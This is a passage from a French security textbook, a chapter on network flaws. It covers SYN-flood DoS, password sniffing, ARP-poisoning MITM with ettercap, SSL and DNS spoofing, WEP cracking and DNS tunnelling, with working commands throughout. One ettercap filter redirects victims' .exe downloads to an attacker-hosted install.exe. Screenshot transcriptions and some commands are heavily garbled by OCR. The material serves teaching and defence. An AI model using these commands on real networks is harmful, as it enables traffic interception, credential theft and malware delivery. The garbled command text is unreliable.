Un DoS (Denial of Service) est une attaque de déni de service. Le but d'un 
déni de service est de faire tomber un serveur. 


L'attaque par Syn flood est l'une des attaques les plus répandues, elle 
consiste à demander des connexions et ne pas y répondre. Lors d'une 
demande de connexion, le serveur est en attente et bloque pendant un cer- 
tain temps une partie de ses ressources pour cette nouvelle connexion. 


Le but est d'envoyer plus de demandes de connexion qu'il ne peut en traiter 
dans un temps donné. Le serveur ne pourra plus subvenir au besoin des 
vrais clients. Voici un exemple simple de ce genre d'attaque. 


L'outil hping2 permet d'effectuer ce genre d'attaque. Nous pouvons l'ins- 
taller via la commande apt-get install hping2. 
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Exemple de tentative de DoS sur le port 80 à l’adresse IP : ipserveur 
hping2 ipserveur -I eth0 -q -i u1 -S --rand-source -p 80 & 


Le DDoS (Distributed Denial of Service) est similaire au DoS, mais l'attaque 
se fait à partir de plusieurs machines. 


Une attaque DoS est simple à contrer, il suffit d'établir une règle dans le 
pare-feu afin de bloquer l'adresse IP attaquante. Dans le cas d'un DDos cela 
se complique énormément. 


Sniffing 


Les sniffers, renifleurs de paquets, sont des outils qui servent à récupérer 
l'ensemble des données transmises par le biais d'un réseau de la couche 2 à 
la couche 7 du modèle OSI. 


Afin d'écouter le trafic, il faudra configurer notre carte réseau en « mode 
promiscuous », ce mode permet d'intercepter tout le trafic réseau, même les 
paquets qui ne nous sont pas destinés. 


De nombreux protocoles réseau ne chiffrent pas les données, il est donc 
possible de voir en clair les mots de passe Telnet, POP, FTP... 


Mais il est tout aussi possible de voir les sites visités sur votre réseau ou 
même les conversations MSN. 


Wireshark anciennement connu sous le nom Ethereal est un sniffer logiciel. 
Installation de Wireshark sous Debian : apt-get install wireshark 


Ou téléchargez les sources ou l'installateur pour d'autres systèmes d'exploi- 
tation sur le site http://www.wireshark.org 


Capturer des données avec Wireshark 


Une fois installé, exécutez Wireshark avec l'utilisateur Root. 
Cliquez sur capture - interface. 


Choisissez votre interface de capture puis cliquez sur start. 
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Eile Edit View Go Capture Analyæ Statistics Telephony Tools Help 


#16 7v+e? a 
iv Sn Epress 
À Sourre Destination Protocol | nfo 
192.168.100. 104 192. 168. 100. 100 TŒ 362 > vlsi-lm [ACK] Seq=346 Ack=3855 win-429 Lan=0 
192.168. 100.164 192. 1£8. 100. 100 Tœæ 26888 > vlsi-lm [PSH, AK] seq=345 4ck=23865 win=829 Len=7 
208 11.504959 192.168. 100. 100 192. 168.100. 104 Tœæ vlsi-lm > 36689 [PSH, a] Seq=256 Ack=353 win=63 Len-109 
209 11.504972 192. 169. 100.104 192.168. 100. 100 TP 36859 > vlsi-ln [AŒ] Seq=353 Ack=3974 Win=829 Len=0 
210 11.505084 192.168. 100.104 192.168. 100. 100 TP 36888 > vlsi-ln (PH, ACK] Seq=353 ack=3974 wWin=829 Lan-8 
211 11.506094 192. 168. 100. 100 192. 168. 100.104 Tcp vlsi-ln > 36289 [PSH, AK] Seq=3974 Ack=361 Win=63 Len=59 
212 11.545343 192. 168. 100. 104 192. 168. 100. 100 TŒ 36889 > visi-lm {ACK} Seq=361 4ck=4033 Win-829 Len-O 
213 12.00185 192. 168. 100.104 192. 169. 100. 100 TO 36888 > vlsi-lm [PSH, AK] Seq=361 Ack=4033 Win=829 Len=7 
214 12.995725 192.168. 100.190 192.168. 100. 104 TO vlsi-lm > 36889 (PH, A] Seq=4033 Ack=368 Win=63 Len=109 
215 12.005762 192. 168. 100. 104 192. 168. 100. 100 TP 36889 > vlsi-lm (AG) Seq=368 Ack=4142 w1n-289 Len=0 
216 12.005878 192.168. 100.104 192. 168. 100. 100 Tœæ 36888 > vlai-ln (PSI, AŒ} Seq=368 Ack-41142 Win=829 Len 
217 12.005878 192.1€8.100. 100 192. 168. 100. 104 TŒ vlsi-lm > 36539 (PSH, A] Seq=4142 4ck=376 Win=63 Len=59 
218 12.045350 192. 168.100.104 192. 168. 100. 100 T 30888 > vlsi-lm [AQ] Seq=376 2ck=4201 Win-429 Len-0 
219 12.504544 192.168. 100. 104 192. 168. 100. 100 Tcp 36888 > vlsi-lm [PSH, 4@] Seq=375 Ack=4261 win=829 Len=7 
220 12.505415 192.168. 100. 100 192. 168. 100.104 Tœæ vlsi-lm > 36689 [PSH, AŒ] Seq-4701 Ack=383 win=63 Len=109 
221 12.505441 192.168. 100.104 192.168. 100. 100 Tœæ 3688 > vlsi-lm [ACK) Seq=383 Ack=4310 Win=829 Len=0 
222 12.505256 192.168. 100.124 192,168. 100. 100 TŒ 36889 > vlsi-lm [PSH, AŒ] Seq-383 ack=4310 Win-829 Len-8 
223 12.506443 192. 168. 100. 100 192. 168. 100. 104 T vlsi-lm > 36888 [PSH, AK] Seq=4310 Ack=391 win=63 Len=59 
224 12.545355 192.168. 100. 104 192.168. 100. 100 Tæ 36888 > vlsi-lm [AC] Seq=391 Ack=4369 Win-829 Len=0 
> Frame 1 (61 bytes on wire, 61 bytes captured} 
D Ethernet 11, Src: Intal_Sb:4c:de (00:16:ea:@b:4c:de), Ost: AsustékC 6e:24:F1 (00:22:15:8e:24:f1)} 
> internet Protocol, Srd: 192.168.100.104 (192.168.100.104), Dst: 192.168. 100.109 (192. 168. 100. 100} 
b Transmission Control Protocol, Src Port: 35888 (36888), st Port: vlsi-lm (1500), Seq: 1, Ack: 1, Len: 7 
> Data (7 bytes} 


La capture commence, en quelques instants de nombreuses lignes s'affi- 
chent, nous capturons des paquets | 


Sélectionnez une ligne, les différentes couches s'affichent, en général la 
couche la plus haute (7-Application) nous intéresse le plus. 


Les filtres 


Même avec de très petits réseaux, nous recevons de très nombreux paquets 
et cela devient vite illisible. Afin de réduire la quantité de paquets nous 
allons n'afficher que ceux qui nous intéressent. 


L'emplacement Filtre nous permet d'indiquer les filtres. 
HTTP || FTP || Telnet 

Affiche les paquets dont le service est de type : HTTP, FTP, TELNET. 
tcp.port == 3306 

Affiche les paquets dont le port source ou destination est 3306. 
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tcp.srcport == 3306 

Affiche les paquets dont le port source est 3306 (port TCP de Mysql). 
tcp.dstport == 3306 

Affiche les paquets dont le port destination est 3306. 


ip.addr == 192.168.0.1 
Affiche les paquets dont l'adresse IP source ou destination est 
192.168.0.1. 


Déclinaison possible : ip.src, ip.dst 
Opérateurs de comparaison : 
== Est égal à 


|= N'est pas égal à 


> Plus grand que 
< Plus petit que 
>= Plus grand ou égal que 
<= Plus petit ou égal que 


Opérateurs logiques : 
Il Ou 
U&I Et 

Die Ou exclusif 

Négation 

Exemple de filtre plus complexe : 

ip.dst == 192.168.0.1 && (tcp.dstport == 3306 || tcp.dstport == 22) 


Recherche les paquets à destination de 192.168.0.1 sur les ports TCP : 3306 
et 22: 


Nous pouvons maintenant tester sur le réseau. Lançons wireshark sur une 
machine et avec une autre exécutons un logiciel de messagerie par exemple. 
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Recherchons les paquets, ils contiennent les mots de passe lorsque les pro- 
tocoles ne sont pas chiffrés. 


Voici une capture d'écran qui montre comment récupérer un mot de passe 
POP; 


Ele Edà Mes Go Captwe Anahe Statistics Help 


Fa Sneha FE AAR AMn 


Mater: {pop | + Erprassion... $ d Effacer ] qf Appliquer 

No.. Time Source estination Protocol | info | 
151 17.692694 213.196.32.20 192. 188.0. I3 pce Response: +CK <9140, 1244884054@ns0. ovh.net> j 
153 17.923773  192.106.0.15 213.165.33.20 aca Request: AUTH | 
157 17.662666 213.186.35.20 192.168.0.15 Pop Response: -EPR authorization first | 
158 17.975754 192. 168.0. 15 213.185.33.20 Fo Request: CAPA | 
160 18.015139 213.186: 33.29 192.168.0.15 Fœ Response: -ERR authorization first 
162 18.018459  192.168.9.15 213. 186.33, 20 Po Request: LER john.doe@oni-edition.tr 
164 18.059194 213. 1865, 32.20 192. 168.0. 15 poe Response: +0K 
165 18.14546¢ 213,186. 3.23 192.168.0.15 PP Fesponse: + 
170 18.145693  192.168.0.15 213.186. 33,20 Po Fequest: STAT 
172 18.184372 213.106.33.20 192.168,0.1$ Pe Response: +OK O 0 
173 18.191187 192.168.0.15 213. 186.23.20 PP Request: OUT 
192 18.496071 213.186.33.20 192. 168.0. 15 Response: +OK D. 


IE 


D Frams 165 {80 bytes on vire, 80 bytes captured) 
b Ethernet 11, Sro: Delt_85:19:19 (00:19:b5:56:19:19), Öst: FneebcxS_ce:13:93 (00:07:cb:ce : 13:00) 
b internet Protccol, Src: 152.168.0.15 (192.160.0.15), Est: 213.108.33.20 (213.19.33.20) 
[> Transmission Control Protocol, Sre Port: 34155 {36155}, Ost Port: pop3 {116), Seq: 41, ach: 94, Le : 14 
¥ Post Office Protocol 

p PASS azerty r\n S 


0000 0 07 cb ce 13 93 3 

0010 UO 42 Oe 46 40 UO 49 GS 74 ea c3 a8 00 Of d5 ba 
[0020 21 14 85 6b en & 22 f8 d0 65 50 fc 65 cl BO i8 
030 00 5c f7 ed CC @Q 0l 01 OS Ca 01 76 de b9 72 b2 
0040 25 cf 50 41 53 53 29 62 72 69 68 61 79 65 % Ca 


eth9: <hve capture n progress> Fi. : Packets: 623 Displayed 40 Marked: 0 à 5 5 Prohle: Defauk 


Sniffing de mot de passe POP 


E Remarque 


Vous trouverez plus d'informations sur les filtres à l'adresse : 
http://www.wireshark.org/docs/dfref/ 


TCPDump est un autre sniffer intéressant pour msgsnart et mailsnarf : 
- msgsnarf - renifle les messages de discussions 

- mailsnarf - renifle les messages électroniques 

- dsniff - renifle les mots de passe 

filesnarf - renifle les fichiers dans un trafic NFS 

urlsnarf - renifle les requêtes HTTP 
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Installation de la suite complète dsniff sous debian via la commande : 
apt-get install dsniff 


Utilisation : msgsnarf -i wlanO 


Man In The Middle (MITM) 


Théorie 
L'attaque de l'homme du milieu ou Man In The Middle (MITM), est une 
attaque utilisant au moins trois ordinateurs. 


Deux ordinateurs communiquent ensemble, un troisième au milieu casse la 
liaison entre les deux ordinateurs, et se fait passer pour l'autre entité, il 
intercepte et renvoie les communications et peut de plus les modifier. 


192.168.0.3 — 7 —— 192.168.0.1 
g # Pa 


K, FE 


192.168.0.254 


Principe de l'attaque 


Chaque ordinateur, routeur sur un réseau possède une adresse Mac. 
Chaque entité possède une table ARP, celle-ci permet de stocker la relation 
Adresse IP/Adresse Mac des ordinateurs du réseau. 


Nous pouvons lister cette table via la commande : arp -a 
Résultat : 


nas-02-81-77.local (192.168.0.12) à 00:0d:a2:17:17:17 [ether] sur eth0 


user@ordi:-$ arp -a 
? (192.168.0.254) à 00:07:cb:00:00:00 [ether] sur eth0 
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L'attaque a pour but de falsifier sur les ordinateurs du réseau la relation 
adresse Mac/adresse IP afin de pouvoir réceptionner et retransmettre les 
données. Cela est possible grâce à la table ARP qui met en cache cette 
association. 


Pratique 


Ettercap est une suite d'outils qui permet de "sniffer" (écouter sur le réseau 
et récupérer les informations) et de "logger" (enregistrer dans un fichier de 
données récupérées). Il permet d'effectuer des attaques du type Man In the 
Middle. 


Installation de ettercap-gtk sous debian : apt-get install ettercap-gtk 


Ettercap possède plusieurs modes de fonctionnement. Pour lancer ettercap 
en mode graphique, tapez ettercap -G 


L'interface graphique est simple d'utilisation. Nous allons présenter le mode 
console. 


ettercap -i wlanO -q -T -M arp:remote -P repoison_arp // // 
ettercap [OPTIONS] [TARGET1] [TARGET2] 

-i interface d'écoute 

-M type d'attaque 

-T interface texte 

-P Plugins 

TARGET1 ip victime 

TARGET?2 ip routeur 
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Gb AptopT/home/brix 


Fichier Édition Affichage Terminal Aide 


root&orix- 


aptop:/home/brix# ettercap -1 ethO -q -T -M arpiremote -P repoison arp // 


ettercap HG-4.7.3 copyright 2001-2004 ALOR & NeGA 
Listening on eth0... {Ethernet} 

etha -> 00:18::9:19::9:10 192.168.0.15 255.255.255.0 
Privileges dropped te ULD Q GID ©... 


28 plugins 

39 protocol diss 

S3 ports monitored 
7587 mac vendor fingerprint 
1698 tep GS fingerprint k 
2183 known services 


=] 100.90 % 
4 hosts added ta the hpets liet... 

ARP poisoning victims: 

GROUP 1 : AA (all the hosts in the list} 

GROUP 2 : AN (all the hosts in the list} 

Starting Unified snifting... 

Text only Interface activatad... 

Hit ‘h' for inline help 


Activating repoisen arp plugin. 


Ettercap en action 
Afin d'accéder au menu d’Ettercap appuyons sur la touche h. 


Naviguons sur le Web avec les ordinateurs sur le réseau, ouvrons nos 
clients FTP, mail et regardons le résultat dans la console ettercap ! 


Afin de quitter ettercap proprement, il suffit d'appuyer sur la touche q. 
Ettercap va envoyer la vraie adresse mac de la passerelle aux victimes. 


Configurer correctement Ettercap 


Afin de bénéficier de toutes les fonctionnalités d'ettercap, vous devez modi- 
fier le fichier /etc/etter.conf. 
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Modifiez les privilèges par : 


Il 
O 


[privs] 
ec uid =-0 # nobody is the default 
ec_gid # nobody is the default 
Dans la session : 
M # redir command on/off 
activez suivant votre cas les lignes redir command on et redir_com- 
mand off. 
Sous Linux, ces règles correspondent à la session : Linux > Iptables : 


redir command on = "iptables -t nat -A PREROUTING -i $iface -p tcp 
--dport $port -j REDIRECT --to-port %rport" 


redir command off = "iptables -t nat -D PREROUTING -i $iface -p tcp 
--dport $port ~j REDIRECT --to-port $rport" 


Nous bénéficions maintenant des attaques SSL, SSH. 


Lancez Ettercap et connectez-vous sur un site utilisant le SSL, un nouveau 
certificat remplace le certificat SSL officiel. Si nous l'acceptons, l'attaque 
réussit, le pirate peut voir les données en clair. Sachez que de nombreux 
utilisateurs acceptent bêtement les nouveaux certificats, même les 
certificats autosignés. 
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Depuis peu, les navigateurs Web proposent des messages plus informatifs 
qu'avant, les illustrations suivantes nous montrent les évolutions des mes- 
sages informatifs lorsque les certificats SSL ne sont pas sûrs : 


Site Web certifié par ane autorité inconnue 


Impossible de vérifier l'identité de comme un ske de confiance, 


Raisons possibles de cette erreur : 


- Votre navigateur ne reconnat pas autorité de certification qui a émis le certificat de ce 
sie. 
- Le certificat du site est incomplet à cause dune mauvaise configuration du serveur, 


- Vous êtes connecté à un site prétendant âre , probablement pour obtenir vos informations 
confidentielles, 


Veuillez informer l'administrateur du site de ce problème. 


Avant d'accepter ce certificat, vous devriez l'examiner soigneusement, Voulez-vous vraiment 
accepter ce certficat pour identfier le she Web ? 


Examiner le certéicat… 


© Accepter définitivement ce certificat 
©) Accepter ce certificat temporsirement pour la durée de La session 
O) Ne pas accepter ce certificat et ne pas se connecter à ce ske Web 


Ancienne alerte certificat non sûr sous Firefox 
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Adresse te hhps:fadssinet 
Web Images Vidéo Maps Actualités Groupes Gmail plus. 


Les formations que vous échangez avec ce site ne peuvent pas 
être consuhées ou madfiées par d'autres Afssteurs. Cependant, 
un problème concemart le certficat de sécunté de caste a été 
détecté. 
Le certificat de sécurié a été émis par une société à 
laquelle vous n'avez pas choisi de faire confiance. 
Consulez le certificat pour décider si vous souhatez faire 
corfiance à l'autorté de cenfication. 
La date du certificat de sécunté est valide. 


Le nom sur le cestficat de sécuné est non vakde ou ne 
correspond pas au nom de ce ste 


Voulez-vous continuer ? 


Ancienne alerte certificat non sûr sous Internet Explorer 


a Cliquez sur Oui et le certificat est accepté. 
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Les nouveaux navigateurs demandent des efforts supplémentaires afin de 
ne pas valider facilement des certificats autosignés : 


& | https :#acissi.net/ 


| Started ÉSlLatest HeadlinesY [S BitTorrent Download... 


Échec de la connexion sécurisée 


Le 


TA 


J acissi.net utilise un certificat de sécurité invalide. 


Le certificat n'est pas sûr car il est auto-signé. 
Le certificat n'est valide que pour +acissi.net. 


(Code d'erreur : sec_error_untrusted_issuer) 


£ Ceci peut-être dû à un problème deRonfgurétion du serveur où à une 
personne essayant d'usurper l'identité du serveur. 


s Si vous vous êtes déjà connecté avec succès à ce serveur, l'erreur est 
peut-être temporaire et Vous pouvez essayer à nauveau plus tard. 


yi ouvez ajouter une eption.. 


Nouvelle alerte certificat non sûr sous Firefox 
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Gə- le} https:ffadssinet/ sisx 


Le certificat de sécurité présenté par ce site Web n'a pas été émis par une autorité de certification approuvée. 
Le certificat de sécurité présenté par ce site Web a été émis pour une autre adresse de site Wei, 


Les probièmes de certificat de sécurité peuvent indiquer une tentative de duperie ou C'intercepticn des 
donnees que vous envoyez sur le serveur. 


Nous vous recommandons de fermer cette page Web et se quitter ce site. 
$ Cliquez id pour farmer cette page Web. 
S Poursuivre aver ce site Web (non recommandé) 


& Informations 


Nouvelle alerte certificat non sûr sous Internet Explorer 


Vous pouvez utiliser le certificat de votre choix en remplaçant l'existant 
disponible à l'emplacement : /usr/share/ettercap/etter.ssl.crt 


Il faut savoir que de nombreux sites Internet n'ont qu'un certificat auto- 
signé et que par conséquent comme tout le monde ne joue pas le jeu, la 
plupart des utilisateurs valident l'acceptation du certificat sans vérifier si 
c'est un faux. 


Les plug-ins 


Il existe de nombreux plug-ins intéressants que vous pouvez activer soit via 
les arguments -P, soit en appuyant sur p dans l'interface console. 


Autoadd : empoisonne les nouveaux arrivants sur le réseau. 
dns_spoof : permet de surcharger le serveur de nom. 


a Éditez le fichier /usr/share/ettercap/etter.dns et ajoutez : 
* microsoft.com A 81.80.245.20 
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g Relancez ettercap avec le plug-in dns_spoof activé. 
Lorsqu'une victime se fera spoofer, le message dns_spoof ci-après s'affichera : 
[www.microsoft.com] spoofed to [81.80.245.20] 


L'utilisateur souhaitant afficher la page http//www.microsoft.com sera 
redirigé sur le serveur editions-eni.fr (adresse IP de ENT : 81.80.245.20) 


remote_browser : affiche dans votre navigateur Web, les sites visités par les 
utilisateurs du réseau. 


Isolate : isole un ordinateur du réseau. 


Si le plug-in recherché n'existe pas, il est possible de le développer 
soi-même en C. Pour ce faire, Ettercap fournit un squelette nommé dum- 
my. Nous pouvons aussi travailler avec les sources des autres plug-ins qui 
permettront d'appréhender ce monde mal documenté qui ne donne plus 
aucune limite à ettercap. 


Bien que le plug-in soit une source inépuisable d'extension, les filtres etter- 
cap sont simples à mettre en œuvre et pour la majorité des cas suffisants ! 


Création d'un filtre 


Des exemples de filtres intéressants sont disponibles dans /usr/share/ 
ettercap/. 


Les conditions : 
if (CONDITION) 
} 


if (CONDITION) 


173 


174 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Les opérateurs et fonctions booléens : 


if (ip.proto == TCP) # Si Paquet TCP alors 


if (tcp.srce == 22 || tcp.dst == 22) # Si Port TCP source ou Port TGE 
destination vaut 22 alors 
if (search(DECODED.data, "etter'")) # Si il y a etter dans les données 
if (regex(DECODED.data, ".*login.*")) # Si l'expression régulière 
DA Fete D Ur POUR 


est trouvée alors. 


Les actions : 


msg("Spoofed\n"); # Affiche Spoofed dans la console ettercap 
log(DATA.data, "./logfile"); # Enregistre les données dans le fichier 
logfile. 

inject("./fake response"); #Injecte dans le paquet le fichier 


fake response 
drop() # supprime le paquet 
tcp.dst -= 1 # décrémente le port TCP de destination. 
exec("./program"); # exécute un programme 


Cette base vous permet, via les conditions et actions, de générer simple- 
ment de nouvelles fonctionnalités. 


Nous allons vous présenter un exemple de filtre simple mais impression- 
nant. Nous allons remplacer tous les fichiers .exe par un nouveau fichier 
„exe de notre choix. 


Chaque fois qu'un utilisateur du réseau va télécharger un fichier exécutable 
via HTTP, nous allons récupérer la demande, puis dire au navigateur que le 
fichier a changé d'emplacement. 


| # si l'on trouve un paquet TCP avec : application, une requête est demandée. 


if (ip.proto == TCP && search(DATA.data, "WINDOWS") ) { 
log(DATA.data, "/tmp/mispelled ettercap.log"); 
replace ("WINDOWS", "LINUX"); 


msg ("SUBSTITUTION 1 WINDOWS->LINUX\n"); 


if (ip.proto == TCP && tcp.dst == 80) { 
if (search(DATA.data, "Accept-Encoding")) { 
replace ("Accept-Encoding", "Accept-Rubbish!"); 


# note: replacement string is same length as original string 
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} 

if (ip.proto == TCP && tcp.sre == 80) { 
replace('"keep-alive", "close" "); 

replace('"Keep-Alive", "close" "); 


} 
if (ip.proto == TCP && search(DATA.data, "GET /install.exe HTTP/1.1") ){ 


msg("redirection--exe\n"); 


if (ip.proto == TCP && search(DATA.data, ": application") ){ 


# on ne redirige que si l’adresse IP n’est pas celle de notre serveur 
avec le nouveau fichier exécutable ou si l'IP est l'IP de l'attaquant. 
Cela évite de faire des boucles de redirection. 


if (ip.srce == ‘ipserveurfichierexecutable' || ip.sre == ‘ipattaquant' 
|| ip.dst == 
‘'ipserveurfichierexecutable' || ip.dst == 'ipattaquant') { 


msg ("Telechargement de notre exécutable en cours\n"); 


} else { 

# Si il y a une demande de téléchargement de fichier autre que la nôtre, 
nous informons le navigateur que le fichier a été déplacé par l'adresse 
http://ipserveurfichierexecutable/install.exe 

replace("200 OK", "301 Moved Permanently 

Location: http://ipserveurfichierexecutable/install.exe 


js 


Q Enregistrez ce script dans un fichier nommé etter.filter.exe. 
Afin d'utiliser le script, nous allons dans un premier temps le compiler. 


I Etterfilter -o etter_ filter exe etter.filter.exe 


Le fichier généré est utilisable par ettercap. Il suffit d'utiliser l'option -F. 


ettercap -i wlan0 -q =T =M arp:remote -P repoison arp // // -E 
/usr/share/ettercap/etter filter exe 
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6.3 Contre-mesure 


Il est simple d'identifier une attaque MITM sur un réseau, il suffit de véri- 
fier régulièrement si le cache ARP de la passerelle à été modifié. L'utilitaire 
arpwatch permet de nous avertir par e-mail de ce genre de changement. 


Installation de arpwatch sous debian via la commande : 


Hapt-get install arpwatch 


Il est possible de contrer cette attaque en utilisant une table arp statique. 
arp -s 


Cette technique permet de fixer les correspondances Mac/IP. Cela reste 
possible avec des petits réseaux de particuliers. Sur de grands réseaux d'en- 
treprise, il est possible de recourir à des solutions matérielles telles que des 
switchs dotés d'une fonctionnalité Port Security. 


Failles Wi-Fi 


Nous avons vu proliférer depuis le début des années 2000 de nouveaux sup- 
ports sans fil pour nos réseaux : la norme Wi-Fi s'est imposée. Les ondes ne 
s'arrêtent pas aux portes et fenêtres, la sécurité de ce type de réseau se 
limite donc au chiffrement. 


Imaginons une faille sur ce type de système ! Il faudrait mettre à jour tout 
le parc pour accepter un nouveau système de chiffrement, mais qu’en est-il 
pour le matériel ? Dans certains cas, il suffit de mettre à jour le firmware 
mais ce n'est pas toujours possible. 


De nombreux réseaux ne possèdent aucune sécurité, d'autres en WEP 
(Wired Equivalent Privacy) peuvent être craqués rapidement. Le WPA2 + 
Serveur d'authentification Radius semble être une bonne solution à la date 
d'écriture de ce livre, informez-vous à ce sujet, car les choses évoluent vite ! 


© Editions ENI - Toute reproduction interdite 


7.1 


Les failles réseaux 
Chapitre 5 


Cracker un réseau WEP 


Aircrack est la suite qui nous permet de craquer les réseaux Wi-Fi. Installa- 
tion sous debian de aircrack-ng : apt-get install aircrack-ng 


Capturer des paquets 


Afin de cracker la clé WEP, nous allons devoir capturer des paquets. Nous 
prenons des hypothèses pour l'exemple : 

- Notre carte s'appelle wlan0. 

- Le nom du réseau (ESSID) se nomme ACISSI. 

- L'adresse Mac de la borne Wi-Fi est : 00:11:22:33:44:55. 

- L'adresse Mac de l'ordinateur client est : 00:00:00:00:00:01. 


a Pour connaître le nom de votre interface, utilisons la commande iwcon- 
fig. 

I airodump-ng --write capturel wlan0 

Airodump est le programme qui vous permet de capturer les paquets Wi-Fi. 


Pour l’exemple les paquets sont capturés à partir de l'interface wlanO, enre- 
gistrés dans le fichier capturel.cap, nous disposerons d'un fichier captu- 
rel.txt avec des informations utiles telles que les clients connectés aux bor- 
nes, les adresses Mac... 


CH 10] [ Elaāäpsed?: 3 mins Ji 2009-02-13 12228 


BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
4A:9A:6D:77:83:49 Qu AZG SSL 1 54e OPN FreeWifi 
OOLI8HE7:2534A5 DD 0 0 07:0 6 54e. WPA TKIP PSK Livebox-31B6 
62: BAF 70::71:355::2E 0 0 0 0 1 54e WPA TKIP MGT freephonie 
BSSID STATION PWR Rate Lost Packets Probes 
AA: GAS GD:776021:62 (00123; DF 26:82:23 0 54e- 1 0 7 
(not associated) 00:09:2D:81:98:62 0 QE k 0 22 ENI 
(not associated) 00:1E:58:95:AB:AB 0 Ore 0 3 
(not associated) 00:23:4D:20:7F:2E 0 RE 0 4 link 


Afin d'optimiser au maximum la capture, nous pouvons spécifier un canal, 
via l'option --channel, l'adresse Mac de la borne Wi-Fi : --bssid. 
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Générer du trafic 


Pour cracker la clé il faut énormément de paquets, 400 000 au moins pour 
une WEP 64 et 1 200 000 au moins pour une WEP 128. S'il n'y a personne 
sur le réseau, cela peut prendre des semaines. 


Nous allons devoir injecter du trafic pour arriver à notre objectif, cette opé- 
ration est optionnelle, mais permet d'accélérer considérablement le 
craquage s'il n'y a pas ou très peu de trafic. 


Votre carte doit donc accepter le mode injection, vous pouvez voir la liste 
de compatibilité sur le site d'aircrack : http://www.aircrack-ng.org 


Aireplay permet d'effectuer plusieurs attaques : 
- -0 : Deauthentification, déconnecte les clients 
- -1 : Fausse authentification 

- -2 : Reinjection de paquet 

- -3 : Injection de requête ARP 

- -4 : Attaque ChopChop 

- -5 : Attaque par fragmentation 

- -6 : Caffe Latte 

- -7: Cfrag 

- -z : PIW attack 


man airecrack-ng nous permettra de découvrir toutes les possibilités de 
cet outil. 


Dans un premier temps, nous allons générer une fausse authentification : 


aireplay-ng -1 0 -e ACISSI -a 00:11:22:33:44:55 -h 00:00:00:00:00:01 
wlan0 
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BRemarque 


il est possible qu'il y ait un filtrage MAC, dans ce cas, utilisez l'adresse Mac 
d'une station connectée au réseau, dans le cas contraire cette procédure va 
échouer. Si vous constatez que le nombre de paquets capturés n'augmente 
plus, générez de fausses authentifications régulièrement dans le but de vous 
authentifier de nouveau. Toutes les cartes et pilotes Wi-Fi ne sont pas compati- 
bles avec l'injection. Vous pouvez vérifier la compatibilité de votre carte sur le 


site officiel d'aircrack : 
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers 


Générons une attaque de type Injection de requête ARP : 


aireplay-ng -3 -e ACISSI -b 00:11:22:33:44:55 -h 00:00:00:00:00:01 
wlan0 


Dès qu'’aireplay injectera des paquets, nous allons voir une nette augmenta- 
tion dans Airodump. 


Trouver la clé 
Lancer aircrack via la commande : 


aircrack-ng capture1.cap 


Aircrack-ng 1.0 rca 


[00:00:11] fested 1245185 keys (got 6334 vs) 


KE depth  bytefvote) 

ü G/ 1  01{10740) 63(8960) 69(8960) 94(8969) 68(8704) 
1 @/ 2  B8!9984) 21(9728) G2(9216) EA(9216) 3D(8960} 
a G/ 1  c7{9084} DF(9472) 33(9216) 89(9216) DA(8960) 
3 G/ 1  22(9084) BS(9728)} 509472) 6F(9216) BB(9216} 
4 0/7 1  81(10752) 49(9728} 05{9216) E7(9216) ©B(8960) 
5 G/ 1  17{10240; 8&D(9984} AG(g984) 58(9472) AD(9472) 
& Ož 1  5C(10496) 7C(9472} 081921.6) 7E9216) 56(8960) 
F 0% 1  S1{10240) 55(0728} 87(9728} 20(8960) 49(8960) 
8 DZ & 21(9728) cot9472) Do(9216) 06(8960) 82(8960} 
a O7 1  16(9984) 1E(9728)j 82(9728) A4(9472} CE(9472) 
16 0/ 1  23{10240) E1(9984) 6119472) ca(9472)] 66(9216) 
li O/ 1  actloz4o) 38(9984) 5Ccit9984) 54(9728) 3C{8960) 
12 O/ 1  9D(19756) 878928) F7(8784) B6(8776) 28{8606) 
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Si aircrack ne trouve pas la clé, il nous faut capturer plus de paquets puis 
relancer aircrack. 


L'illustration suivante montre la finalité de l'attaque : nous trouvons la clé : 
0327466969, avec moins de 47000 paquets. L'attaque PTW a été ajoutée de- 
puis peu sous aircrack et permet de réduire considérablement le nombre ivs 
indispensable (PWT vient de Andrei Pyshkin, Erik Tews and Ralf-Philipp 
Weinmann, les trois auteurs de l'article mettant en œuvre une nouvelle at- 
taque du WEP grâce à une corrélation du générateur pseudo-aléatoire dans 
l'algorithme de chiffrement). 


root@br1x-laptop:/home/brix# aircrack-ng  chezdd. cap 
Opening  chezdd. cap 
ead 135397 packets. 


#  BSSID ESSI C Encryption 
1 DD:DD:DD:DD:DD:DD chezdd EAPOLHWEP (46903 IVs) 


Ehoosing first network as target. k 
Opening chezdd. cap 
Attack will be restarted every 5090 captured ivs. 
Starting PTr attack with 46928 ivs. 

KEY FOUND! [ G3:27:46:69:69 ] 
Decrypted correctly: 100% 


Clé trouvée avec 47000 paquets grâce à PTW 


Si le filtrage Mac est activé il suffit d'installer macchanger, via la com- 
mande : apt-get install macchanger 

Pour changer votre adresse Mac : macchanger -m 00:00:00:00:00:01 
wlan0 


Cracker le WPA 


Pour le WPA, les choses se compliquent. Aircrack permet de trouver les clés 
qui sont dans un dictionnaire. Il est intéressant de surveiller le projet 
tkiptun-ng qui a été intégré à la suite aircrack depuis peu. 


Le WPA peut être considéré à ce jour comme fiable pour les particuliers, 
mais cela peut rapidement changer ! 
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Ip over DNS 


Principe 


L'ip over DNS est une technique qui tend à se répandre. En effet, de plus 
en plus de hotspots Wi-Fi sont disponibles. Le problème est qu'il faut sou- 
vent s'authentifier afin d'avoir accès à l'Internet. 


La majorité de ces hotspots sont mal configurés et laissent passer les requê- 
tes DNS. Il est alors possible d'encapsuler des paquets TCP/UDP dans une 
fausse requête DNS afin de créer un tunnel. Cette technique est connue, 
mais pas encore très répandue faute de moyens. En effet, pour effectuer 
cette attaque, nous avons besoin de posséder : un serveur, une ip publique, 
un nom de domaine. 


En pratique 


Iodine est une excellente implémentation de l'ip over DNS et ceci, de façon 
sécurisée. 


Installer iodine 


Récupérer l'archive sur le site http://code.kryo.se/iodine/ 


# décompressons-l'archive 

tar xvzf iodine-0.5.2.tar.gz 

# compilons iodine 

make 

# installons iodine en root 

make install 

# lancez iodine serveur 

iodined -f 10.0.0.1 votredomaine.com 


Nous devons modifier le fichier zone du domaine afin de déléguer le 
sous-domaine à notre faux serveur DNS. 


tunnellhost IN A ipduserveur 
tunnel1 IN NS tunnellhost.mytunnel.conm. 
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Du côté client, il suffit d'installer iodine comme indiqué précédemment et 
de lancer la commande suivante : 


iodine -f ipduserveur votredomaine.com 


